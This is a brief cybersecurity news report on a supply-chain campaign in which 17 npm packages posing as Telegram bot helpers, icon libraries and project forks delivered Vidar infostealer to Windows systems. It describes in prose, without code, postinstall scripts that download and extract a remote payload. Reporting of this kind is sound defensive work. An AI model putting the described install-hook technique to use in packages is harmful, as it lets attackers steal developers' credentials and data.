15+ Weaponized Npm Packages Attacking Windows Systems To Deliver...

A sophisticated supply-chain attack has emerged targeting Windows systems through compromised npm packages, marking a critical vulnerability in open-source software distribution.

Between October 21 and 26, 2025, threat actors published 17 malicious npm packages containing 23 releases designed to deliver Vidar infostealer malware.

The campaign exploited the trust developers place in package registries, leveraging legitimate-appearing packages that masqueraded as Telegram bot helpers, icon libraries, and forks of popular projects including Cursor and React.

The attack leveraged two recently created npm accounts, aartje and saliii229911, which published packages downloaded over 2,240 times before removal from the registry.

This distribution method represents a paradigm shift for Vidar, historically spread through phishing emails with malicious Office documents.

The deceptive packaging and seemingly legitimate functionality allowed the malicious code to propagate widely before detection.

Datadog Security Labs security researchers identified the campaign through their GuardDog static analyzer, which flagged suspicious indicators including postinstall script execution and process spawning operations.

The discovery revealed that all packages executed identical attack chains through postinstall scripts, with some variants using PowerShell commands embedded directly in package.json files.

The attack demonstrates remarkable simplicity in execution. When developers installed compromised packages, postinstall scripts automatically triggered, downloading an encrypted ZIP archive from bullethost.cloud infrastructure.

The downloader scripts used hardcoded credentials to extract the archive, retrieving bridle.exe, a Go-compiled Vidar variant previously unseen in npm distributions.

Source: Cybersecurity News